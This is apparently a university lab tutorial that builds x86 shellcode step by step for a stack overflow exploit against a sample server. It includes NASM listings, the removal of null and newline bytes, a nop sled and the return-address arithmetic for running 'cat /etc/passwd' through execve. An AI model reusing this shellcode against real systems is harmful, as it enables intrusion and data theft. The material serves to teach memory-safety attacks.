The Exploit

The exploit steals data through a stack overflow vulnerability. The server runs with its standard input and output (stdin and stdout) connected to the network socket. We want the server to execute the following command:

sh -c "cat /etc/passwd; exit" 

The sh command is the shell. If we execute it by itself, we get a command shell where we can type commands and get responses. Instead we want it to execute one command for us and send us the output. This command could be almost anything. We could ask it to delete a file, connect to another machine and copy a worm to the target machine, or, as in this case, read the contents of a file and send it to us. The actual file that contains the passwords is /etc/shadow, and it is only readable by root. The server is not running as root, so we would not be able to read it unless we knew of another exploit that allowed us to raise the privilege of our process. But the /etc/passwd file will give us a list of valid accounts, which is still useful information. The target could just as easily be the contents of a mail folder, the printer spool or some other directory.

The exec system call is used to replace the current process with a new process. If we really wanted to be invisible, we would fork the server process and let it continue normally. However, since this is only a two-week lab, we will simply replace the server with the shell. There are several exec system calls, each with slightly different parameters. The one we will be using is the execve system call. It has the following signature:

result = execve(const char * path, char *const argv[], char *const envp[]);

The code for this system call is 11 decimal or 0x0b hex. The first parameter is the path to the command to be executed. In this case it is a pointer to the string "/bin/sh". The second parameter is a pointer to the argv parameter that will be passed to the main function of the process. This is an array of pointers to strings. For our command it holds pointers to the strings "/bin/sh", "-c" and "cat /etc/passwd;exit", followed by a NULL pointer.

The third parameter is an array containing the environment variables, such as the search path (PATH variable). Since we are running a standard command, we do not have to provide a set of environment variables, so the last parameter can be NULL.

So we have to have the following contents in the registers:

eax  0x0b
ebx ptr to "/bin/sh"
ecx ptr to argv array
edx 0

Figure 6 shows this in a different manner:


Figure 6 - argument layout for execve system call

However, what figure 6 doesn't show is that we have to organize the structure in memory. When we compile a program, the compiler and the linker generate a file with the appropriate layout so that the operating system will load it when we want it executed. We have to provide the function of the assembler, the linker and the loader during our attack. Figure 7 shows the layout in memory of our attack.


Figure 7 – Program Layout in Memory

The memory starts at the beginning of the array on the stack. The distance from the beginning of the array to the return address may be longer than your code and data, so padding characters may be needed to push the instructions and data up to the return address. One other concern is that the function may modify some local variables before it returns. If those local variables are between the array and the return address, then we have to insert some padding between the data and the return address so that our data will not be modified when the local variables are modified. A perfect example is in the sample code on the previous web page. After the gets routine is called, the result variable is modified (memory is allocated and the pointer is assigned to result). This 4 byte variable is between the array and the return address, so that location in our attack cannot contain data we need for the attack. For the purpose of the assignment, no such variable exists in the sample server you are attacking. The last two bytes of the program are a newline and a null character. The newline is used to terminate the gets call. The null character is the end of the string.

So let's look at what a naive approach to this code would look like (we will fix it later). We will discuss the early attack analysis later, but assume that we know that the return address is located at 0xbffff510. Let's start with the data part of the program:

exeStr:    db "/bin/sh",0x0
flagStr:   db "-c",0x0
cmdStr:    db "cat /etc/passwd;exit",0x0
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0x0

This contains the string data first, and then the argv array. The strings are terminated with the NULL character, and the argv array is also NULL terminated. You should already be objecting. After all, I already said that the data cannot contain null bytes. But we will leave that for later. The naive program contains the following instructions:

           mov eax,0x0b
           mov ebx,exeStr
           mov ecx,arrayAddr
           mov edx,0x0
           int 0x80

So the entire naive program looks like

           bits 32
           mov eax,0x0b
           mov ebx,exeStr
           mov ecx,arrayAddr
           mov edx,0x0
           int 0x80
exeStr:    db "/bin/sh",0x0
flagStr:   db "-c",0x0
cmdStr:    db "cat /etc/passwd;exit",0x0
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0x0

If we were somehow to get this program into the buffer memory and set the return address on the stack to the first mov instruction, then the attack would succeed. However, we cannot get this program into the memory. First, there are the nulls in the data. So let's fix that first. Consider the following:

           bits 32
           mov eax,0x0b
           mov ebx,exeStr
           mov ecx,arrayAddr
           mov edx,0x0
           int 0x80
exeStr:    db "/bin/shX"
flagStr:   db "-cX"
cmdStr:    db "cat /etc/passwd;exitX"
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0xffffffff

In this code all of the NULL bytes have been replaced by the character 'X', and the null word at the end of the array is now 0xffffffff. Therefore we can get the data over the network into the target program. However, that means we have to add instructions that write the null bytes back into the data at run time.

           bits 32
           mov eax,0x00
           mov [flagStr-1],al     ; move one null byte to end of /bin/sh
           mov [cmdStr-1],al      ; move one null byte to end of -c
           mov [arrayAddr-1],al   ; move one null byte to end of shell command
           mov [arrayAddr+12],eax ; move null word to end of array
           mov eax,0x0b
           mov ebx,exeStr
           mov ecx,arrayAddr
           mov edx,0x0
           int 0x80
exeStr:    db "/bin/shX"
flagStr:   db "-cX"
cmdStr:    db "cat /etc/passwd;exitX"
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0xffffffff

Let's look at the results of this code in nasm. Assuming this is in the file exploit.nasm, using the command

nasm -l exploit.lst -f bin exploit.nasm

will produce the following list file (note: this assumes NASM 0.98.38, the version used on Slackware).

  1 00000000 B800000000                  mov eax,0x00
  2 00000005 A2[36000000]                mov [flagStr-1],al     ; move one null byte to end of /bin/sh
  3 0000000A A2[39000000]                mov [cmdStr-1],al      ; move one null byte to end of -c
  4 0000000F A2[4E000000]                mov [arrayAddr-1],al   ; move one null byte to end of shell command
  5 00000014 A3[5B000000]                mov [arrayAddr+12],eax ; move null word to end of array
  6 00000019 B80B000000                  mov eax,0x0b
  7 0000001E BB[2F000000]                mov ebx,exeStr
  8 00000023 B9[4F000000]                mov ecx,arrayAddr
  9 00000028 BA00000000                  mov edx,0x0
 10 0000002D CD80                        int 0x80
 11 0000002F 2F62696E2F736858    exeStr: db "/bin/shX"
 12 00000037 2D6358             flagStr: db "-cX"
 13 0000003A 636174202F6574632F- cmdStr: db "cat /etc/passwd;exitX"
 14 00000043 7061737377643B6578-
 15 0000004C 697458 
 16 0000004F [2F000000]       arrayAddr: dd exeStr
 17 00000053 [37000000]                  dd flagStr
 18 00000057 [3A000000]                  dd cmdStr
 19 0000005B FFFFFFFF                    dd 0xffffffff

There are several problems. The first is that the addresses are zero based while the real addresses are on the stack (in the 0xbffff900 - 0xbfffffc0 range). While we can fix those addresses manually (i.e. change the 2F000000 on line 7 to the real address on the stack), it is better if the code is position independent so we only have to enter one manual address, the new return address that will point into our code. For one thing, an address itself may contain a null byte or a newline byte (for example 0xbfff0a00 contains both). So what do we do? The best thing to do is to get the address of the first element of the data into an index register. We can do this with a jump and a call instruction.

start:   jmp short codeEnd
start2:  pop esi
         ...code...
codeEnd: call start2
         ... data...

This will jump to the end of the code and then use a subroutine call to get back to the beginning of the code. The short modifier of the jump instruction says that the jump is a maximum of 127 bytes. This limits the PC relative offset to a single byte. The call instruction pushes the address of the instruction following the call on the stack. In our case, this is the first byte of the "/bin/shX" string. So we pop the address off the stack into the source index register. We then use the index register to access the bytes.
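The relative displacements used by the jump and the call can be worked out by hand. The following is a minimal Python sketch, not part of the lab tools; the function names rel8 and rel32 and the offsets are illustrative assumptions. It shows why a backward call is convenient here: a small negative 32-bit displacement is padded with 0xFF bytes rather than null bytes.

```python
import struct

def rel8(instr_offset, target_offset):
    """Displacement byte for a 2-byte `jmp short` located at instr_offset."""
    disp = target_offset - (instr_offset + 2)  # relative to the next instruction
    if not -128 <= disp <= 127:
        raise ValueError("target out of range for a short jump")
    return struct.pack("<b", disp)

def rel32(instr_offset, target_offset):
    """Displacement bytes for a 5-byte `call` located at instr_offset."""
    disp = target_offset - (instr_offset + 5)  # relative to the next instruction
    return struct.pack("<i", disp)

# Illustrative offsets (assumed for this sketch):
# jmp short at 0x02, pop esi at 0x04, call at 0x36.
jmp_disp = rel8(0x02, 0x36)
call_disp = rel32(0x36, 0x04)
print(jmp_disp.hex(), call_disp.hex())
```

A forward call over the same distance would have a small positive displacement and therefore three null bytes, which is why the call is placed at the end and jumps backward.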

           bits 32
           nop
           nop
start:     jmp short codeEnd
start2:    pop esi
           mov eax,0x00
           mov [esi+flagStr-exeStr-1],al     ; move one null byte to end of /bin/sh
           mov [esi+cmdStr-exeStr-1],al      ; move one null byte to end of -c
           mov [esi+arrayAddr-exeStr-1],al   ; move one null byte to end of shell command
           mov [esi+arrayAddr-exeStr+12],eax ; move null word to end of array
           mov eax,0x0b
           mov ebx,esi
           lea ecx,[esi+arrayAddr-exeStr]
           mov edx,0x0
           int 0x80
codeEnd:   call start2
exeStr:    db "/bin/shX"
flagStr:   db "-cX"
cmdStr:    db "cat /etc/passwd;exitX"
arrayAddr: dd exeStr
           dd flagStr
           dd cmdStr
           dd 0xffffffff
newAddr:   dd newAddr-start

Notice that each of the memory references to store the nulls in the data now use the source index register, esi, and also the exeStr label. For example the reference:

    [arrayAddr-1] 

becomes:

    [esi+arrayAddr-exeStr-1] 

Since the esi register contains the location of the exeStr label, subtracting the exeStr label gives us the appropriate index to use with the esi register. The esi register also provides us with the value for the ebx register. Obtaining the address of the argument array uses the load effective address (lea) instruction. This is like a move instruction, but the address of the operand is used instead of the contents of the memory. Two other additions have been made to the code. The first is a couple of no-operation instructions (nop). This provides us with some leeway in the return address. The second is that we have allocated some room for the actual return address. This will store the address of the beginning of the code. We ask the assembler to store the length of the code there (newAddr-start). We will use this value later. This gets us a little closer:

     1                                             bits 32
     2 00000000 90                                 nop
     3 00000001 90                                 nop
     4 00000002 EB32                    start:     jmp short codeEnd
     5 00000004 5E                      start2:    pop esi
     6 00000005 B800000000                         mov eax,0x00
     7 0000000A 888607000000                       mov [esi+flagStr-exeStr-1],al
     8 00000010 88860A000000                       mov [esi+cmdStr-exeStr-1],al
     9 00000016 88861F000000                       mov [esi+arrayAddr-exeStr-1],al
    10 0000001C 89862C000000                       mov [esi+arrayAddr-exeStr+12],eax
    11 00000022 B80B000000                         mov eax,0x0b
    12 00000027 89F3                               mov ebx,esi
    13 00000029 8D8E20000000                       lea ecx,[esi+arrayAddr-exeStr]
    14 0000002F BA00000000                         mov edx,0x0
    15 00000034 CD80                               int 0x80
    16 00000036 E8C9FFFFFF              codeEnd:   call start2
    17 0000003B 2F62696E2F736858        exeStr:    db "/bin/shX"
    18 00000043 2D6358                  flagStr:   db "-cX"
    19 00000046 636174202F6574632F-     cmdStr:    db "cat /etc/passwd;exitX"
    20 0000004F 7061737377643B6578-
    21 00000058 697458             
    22 0000005B [3B000000]              arrayAddr: dd exeStr
    23 0000005F [43000000]                         dd flagStr
    24 00000063 [46000000]                         dd cmdStr
    25 00000067 FFFFFFFF                           dd 0xffffffff
    26 0000006B 69000000                newAddr:   dd newAddr-start

But there are a lot of null bytes sitting around. Most of them are in the offsets from esi. These offsets are not the length of the code but the distance from exeStr. These are all short distances. Adding the byte attribute to the addresses solves that problem:

     1                                             bits 32
     2 00000000 90                                 nop
     3 00000001 90                                 nop
     4 00000002 EB23                    start:     jmp short codeEnd
     5 00000004 5E                      start2:    pop esi
     6 00000005 B800000000                         mov eax,0x00
     7 0000000A 884607                             mov [byte esi+flagStr-exeStr-1],al
     8 0000000D 88460A                             mov [byte esi+cmdStr-exeStr-1],al
     9 00000010 88461F                             mov [byte esi+arrayAddr-exeStr-1],al
    10 00000013 89462C                             mov [byte esi+arrayAddr-exeStr+12],eax
    11 00000016 B80B000000                         mov eax,0x0b
    12 0000001B 89F3                               mov ebx,esi
    13 0000001D 8D4E20                             lea ecx,[byte esi+arrayAddr-exeStr]
    14 00000020 BA00000000                         mov edx,0x0
    15 00000025 CD80                               int 0x80
    16 00000027 E8D8FFFFFF              codeEnd:   call start2
    17 0000002C 2F62696E2F736858        exeStr:    db "/bin/shX"
    18 00000034 2D6358                  flagStr:   db "-cX"
    19 00000037 636174202F6574632F-     cmdStr:    db "cat /etc/passwd;exitX"
    20 00000040 7061737377643B6578-
    21 00000049 697458             
    22 0000004C [2C000000]              arrayAddr: dd exeStr
    23 00000050 [34000000]                         dd flagStr
    24 00000054 [37000000]                         dd cmdStr
    25 00000058 FFFFFFFF                           dd 0xffffffff
    26 0000005C 5A000000                newAddr:   dd newAddr-start
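The one-byte displacements in lines 7 to 10 and 13 of the listing can be double-checked from the string lengths alone. The following is a small Python sketch (the variable names are illustrative, not part of the lab code) that recomputes each offset from esi:

```python
# Data laid out in the same order as in the assembly source.
exe_str = b"/bin/shX"
flag_str = b"-cX"
cmd_str = b"cat /etc/passwd;exitX"

# Offset of each label relative to exeStr (the address held in esi).
flag_off = len(exe_str)
cmd_off = flag_off + len(flag_str)
array_off = cmd_off + len(cmd_str)

displacements = {
    "flagStr-exeStr-1": flag_off - 1,       # 'X' after /bin/sh
    "cmdStr-exeStr-1": cmd_off - 1,         # 'X' after -c
    "arrayAddr-exeStr-1": array_off - 1,    # 'X' after the shell command
    "arrayAddr-exeStr+12": array_off + 12,  # last word of the argv array
    "arrayAddr-exeStr": array_off,          # start of the argv array
}

for expr, value in displacements.items():
    print(f"esi+{expr:<20} = 0x{value:02X}")
```

Each value should match the last byte of the corresponding instruction in the listing.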

There are only three problems left with the shell code. The first is the remaining nulls in the code. They all come from the same source: moving a constant to a register means storing the constant in the code. There are two instructions that attempt to zero a register (lines 6 and 14). We can instead zero a register by xoring it with itself:

xor eax,eax

This zeroes the register without storing a constant in the code. The other constant is on line 11. We want the A register to have the value 0x0b. This constant is only 8 bits long, but a 32 bit move also has to zero out the high bits, so it must include the three null bytes. It turns out the A register is already zero (from line 6). So we only have to move into the lower 8 bits:

mov al,0x0b

The second problem is that there is a newline in the middle of the code. Can you see it?

It is on line 8. The server program uses a gets function call to read from the network. If we try to send this code to the server, the server will stop reading at line 8 and will not overflow the return address. The offending byte is the offset for the instruction that moves a null byte to the end of the "-c" string. If we check, we see that the 'X' placeholder character is indeed 10 characters from the beginning of the data part of our code. We can fix this by adding an arbitrary byte to the end of the /bin/shX string (i.e. "/bin/shXy"). This will change the offset from 0x0A to 0x0B. But we have to remember to change the offset expression on line 7 (to flagStr-exeStr-2) so that the null byte still lands on the 'X'.
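Spotting such bytes by eye is error prone, so it can help to scan the assembled bytes mechanically. The following is a minimal Python sketch; the helper name find_bad_bytes is an assumption for illustration and is not part of the lab files. It is run here on the machine code of lines 7 and 8 of the listing.

```python
# Bytes that must not appear in the code sent to the server.
BAD_BYTES = {0x00: "null", 0x0A: "newline"}

def find_bad_bytes(code):
    """Return (offset, name) pairs for every null or newline byte in code."""
    return [(i, BAD_BYTES[b]) for i, b in enumerate(code) if b in BAD_BYTES]

# Machine code for listing lines 7 and 8 (byte displacements 0x07 and 0x0A).
sample = bytes.fromhex("884607" "88460A")
hits = find_bad_bytes(sample)
print(hits)
```

Running the same check over the whole assembled file after each change shows whether any null or newline bytes remain.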

The last problem is the contents of the argument array. We have to get the correct addresses into this code. Instead of putting in the address directly, we use some filler values that will be guaranteed to transmit properly through the network:

arrayAddr: dd 0xffffffff
           dd 0xffffffff
           dd 0xffffffff
           dd 0xffffffff

Then we add code that computes each address at runtime and puts it into the array. For example, to store the address of the "-c" string in the second element of the array:

lea edi,[byte esi+flagStr-exeStr]
mov [byte esi+arrayAddr-exeStr+4],edi

When these changes are made, the shell code is complete. Assemble the code and copy the resulting bytes to selfcomp.c. Each byte (2 hex digits) must be reformatted as a C character constant. That is, each is 0xHH where H is a hexadecimal digit. I find it helps to put the assembly in comments beside each set of hex bytes to keep the program straight.
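Retyping the bytes by hand invites mistakes. The following is a small Python sketch of one way to do the reformatting; the function name to_c_constants and the sample bytes are assumptions for illustration, and the assembly comments still have to be added by hand.

```python
def to_c_constants(code, per_line=8):
    """Format raw bytes as comma-separated 0xHH constants, per_line to a row."""
    lines = []
    for i in range(0, len(code), per_line):
        chunk = code[i:i + per_line]
        lines.append(", ".join(f"0x{b:02X}" for b in chunk) + ",")
    return "\n".join(lines)

# Sample input only: nop, nop, int 0x80.
example = bytes.fromhex("9090CD80")
formatted = to_c_constants(example)
print(formatted)
```

The output rows can be pasted into the character array initializer in the C file.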

Make sure you put enough 0x90 (nop instruction) padding at the beginning so that the four bytes that are the new return address align with the WXYZ in the string that you used to crash the program. So if you had 142 'x' characters, and the program and data are 115 bytes long (before the return address), then you have to put in 27 nop instructions.
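The padding count is a simple subtraction, sketched below in Python with the numbers from the example above. The function name nop_padding is an assumption for illustration.

```python
def nop_padding(filler_count, payload_len):
    """Number of nop bytes needed in front of the code and data."""
    if payload_len > filler_count:
        raise ValueError("code and data do not fit in front of the return address")
    return filler_count - payload_len

pad = nop_padding(142, 115)  # 142 'x' characters, 115 bytes of code and data
sled = b"\x90" * pad         # the nop bytes themselves
print(pad, len(sled))
```

The check for a payload that is too long is worth keeping: if the code and data are longer than the filler, they will not fit in front of the return address.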

The last thing to do is to figure out the return address. If we subtract 4 from the stack pointer given by the debugger when we crashed the program, we get the address of the return address. The assembler has computed the length of our program and stored it in the last word of the program. So we subtract that value from the address of the return address and that is the value we use for that word. So for example, if the address given in the debugger was 0xbffff72a and the length of the code is 0x69, then the value for the last word is

bffff72a - 4 - 69 = bffff726 - 69 = bffff6bd
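Hexadecimal subtraction is easy to get wrong by hand, so the arithmetic can be checked with a few lines of Python. This is a sketch only; the function name return_word is an assumption, and the inputs are the example values from the text. It also packs the result in little-endian order, which is how the four bytes appear in memory on x86.

```python
import struct

def return_word(sp_at_crash, code_len):
    """Value for the last word: address of the return slot minus the code length."""
    ret_slot = sp_at_crash - 4   # address of the overwritten return address
    return ret_slot - code_len   # start of the code (label start)

addr = return_word(0xBFFFF72A, 0x69)
packed = struct.pack("<I", addr)  # byte order as stored on the stack
print(hex(addr), packed.hex())
```

The packed bytes should also be checked for null and newline bytes, since the return address travels through the same gets call as the rest of the code.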

When you add the code to client.c, remember that you have to add a newline and a null byte to the end of your code so that the gets in the server will return and the fprintf in the client will stop sending data.